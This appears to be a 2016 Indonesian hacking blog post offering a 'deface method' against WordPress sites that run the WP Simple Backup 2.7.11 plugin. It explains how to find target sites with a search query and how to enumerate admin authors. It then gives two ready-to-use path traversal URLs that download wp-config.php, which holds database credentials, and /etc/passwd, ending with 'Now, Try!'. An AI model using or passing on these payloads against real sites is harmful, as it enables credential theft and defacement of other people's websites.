Header Ads

Home > Dork > Tutorial > Wordpress Plugins WP Simple Backup 2.7.11 Local File Download&Local File Inclusion

Wordpress Plugins WP Simple Backup 2.7.11 Local File Download&Local File Inclusion

Tuesday, October 25, 2016 ,
saya ingin membagikan sebuah Methode deface Wordpress Plugins WP Simple Backup 2.7.11 Local File Download&Local File Inclusion

how to use it ? how to do ? let see ..
 
Dork : N/A 
 
Penjelasan :
Plugins Wordpress ini sangat Responsible sehingga saat kita menggunakan exploit tertentu akan mendownload suatu file berupa .tar extension yang berisi sebuah Informasi suatu struktur database website yang menjadi target kita ...

POC :
 
1.find Targets Wordpress (use inurl:/wp-login.php)
 
2.See the author .. how ? site/author?=1,site/author?=2 dan seterusnya jika setelah angka 1 404 not found brarti single admin atau tidak ada user level lain hanya 1 admin saja .
 
3.now .. downloaded the files using this exploit :
 
/wp-admin/tools.php?page=backup_manager&download_backup_file=oldBackups/../../wp-config.php < Downloaded With tools.php Affected Virus By PizzahatHackers
 
or
 
/wp-admin/tools.php?page=backup_manager&download_backup_file=oldBackups/../../../../../../etc/passwd < Local File Inclusion

Now,Try!

/End
 
Semoga Bermanfaat

Terima Kasih Mr.XSecr3t | Indonesian Cyber DarkNet Team :)

Post a Comment

No comments

Silahkan Komentar dengan bahasa yang sopan

Subscribe to: Post Comments ( Atom )
Powered by Blogger.